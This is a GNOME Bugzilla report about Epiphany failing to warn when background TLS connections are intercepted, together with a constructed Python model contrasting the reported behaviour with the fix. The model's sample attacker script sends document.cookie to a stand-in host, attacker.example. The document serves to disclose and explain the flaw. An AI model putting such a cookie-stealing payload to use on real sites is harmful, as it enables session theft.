GNOME Bugzilla – Bug 639764
MITM attacker can intercept background SSL connections without warning
Last modified: 2014-08-08 14:44:41 UTC
Epiphany is willing to connect to an SSL server regardless of the certificate. The lock in the URL bar indicates whether the main HTML page was received via a connection with a good certificate. This is argued to be insufficient warning (bug 542454). But quite apart from that, the certificate status of connections other than the one used to retrieve the main HTML page is not indicated at all. A MITM attacker can intercept these "background" connections and respond with malicious data while the lock in the URL bar remains unbroken. In my testing, when Epiphany loads a page with multiple embedded items, it opens one or more background connections in addition to the main connection and retrieves the items in parallel across all the connections. Thus, Epiphany's SSL implementation provides no security against a MITM attacker on a modern web site with multiple <script src> tags, such as this bug tracker, since the attacker can substitute arbitrary script that will run in the site's security origin. For steps to reproduce, see https://bugzilla.redhat.com/show_bug.cgi?id=643224 .
Priority: immediate; "is a security issue in a released version of the software."
Thanks for the simple test case. This is fixed by attachment #280439 [details] in bug #708847 (though the commit message does not indicate this) which causes background connections that fail to be silently dropped. (I've verified that this is the same behavior as Firefox, so I think that's sufficient.)
Matt, sorry this serious bug went unresolved for so long. It should be fixed in our upcoming 3.14 release.
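Added example, not code from Epiphany, WebKit or the attachment referenced above: a small Python model of the two behaviours described in this bug. It tracks certificate status per TLS connection rather than per page, then compares the policy reported by Matt (the lock reflects only the main connection, and whatever any connection delivers is used) against the fix described in the previous comment (background connections whose certificate fails are silently dropped). The `Connection` class, `load_page`, `indicator_misleading` and the sample page with its attacker-supplied script are all constructed for illustration.

```python
"""Model of lock-indicator state versus what a page actually executes.

Constructed example for this bug report; it is not browser code. The policy
with drop_failed_bg=False reproduces the reported behaviour, the policy with
drop_failed_bg=True reproduces the described fix.
"""
from dataclasses import dataclass, field
from typing import List, Tuple


@dataclass
class Connection:
    """One TLS connection to the site.

    cert_ok is False when certificate validation failed, e.g. because a MITM
    terminated the connection with its own certificate. In that case the
    attacker, not the site, chose the bytes in `resources`.
    """
    cid: int
    cert_ok: bool
    resources: List[Tuple[str, bytes]] = field(default_factory=list)


def load_page(main: Connection, background: List[Connection],
              drop_failed_bg: bool) -> Tuple[bool, List[bytes]]:
    """Return (lock_shown, scripts_executed_in_origin).

    The lock is computed from the main connection only, in both policies,
    matching the behaviour described in the report and in the fix. The
    policies differ in what happens to resources delivered over a background
    connection whose certificate failed.
    """
    lock_shown = main.cert_ok
    executed: List[bytes] = []
    for conn in [main] + background:
        # Fix: a failed background connection contributes nothing to the page.
        if drop_failed_bg and conn is not main and not conn.cert_ok:
            continue
        for name, body in conn.resources:
            if name.endswith(".js"):      # <script src> targets run in-origin
                executed.append(body)
    return lock_shown, executed


def scripts_from_untrusted_connections(main: Connection,
                                       background: List[Connection]) -> List[str]:
    """Audit helper: script resources delivered over any connection whose
    certificate did not validate. A sound indicator must not show a lock
    while any of these reach the page."""
    return [name
            for conn in [main] + background
            if not conn.cert_ok
            for name, _ in conn.resources
            if name.endswith(".js")]


def indicator_misleading(main: Connection, background: List[Connection],
                         drop_failed_bg: bool) -> bool:
    """True when the lock is shown but attacker-controlled script executed."""
    lock, executed = load_page(main, background, drop_failed_bg)
    tainted = {body
               for conn in [main] + background if not conn.cert_ok
               for _, body in conn.resources}
    return lock and any(body in tainted for body in executed)


# Constructed scenario: the HTML and one script arrive over the main
# connection with a good certificate; a second, parallel connection is
# intercepted and delivers the attacker's version of a second script.
GOOD_JS = b"window.app = 'genuine';"
ATTACKER_JS = b"new Image().src = 'https://attacker.example/?c=' + document.cookie;"

MAIN = Connection(cid=1, cert_ok=True,
                  resources=[("index.html", b"<script src=a.js></script>"
                                            b"<script src=b.js></script>"),
                             ("a.js", GOOD_JS)])
BACKGROUND = [Connection(cid=2, cert_ok=False, resources=[("b.js", ATTACKER_JS)])]

if __name__ == "__main__":
    for policy in (False, True):
        lock, scripts = load_page(MAIN, BACKGROUND, drop_failed_bg=policy)
        print(f"drop_failed_bg={policy}: lock={lock}, "
              f"scripts={[s[:20] for s in scripts]}, "
              f"misleading={indicator_misleading(MAIN, BACKGROUND, policy)}")
```

The reported policy shows an unbroken lock while the attacker's `b.js` runs in the site's origin; with the fix the lock state is unchanged but `b.js` never reaches the page, so the indicator no longer lies about what executed. `scripts_from_untrusted_connections` is the check worth running against any per-connection model: if it returns anything while the lock is shown, the indicator is misleading.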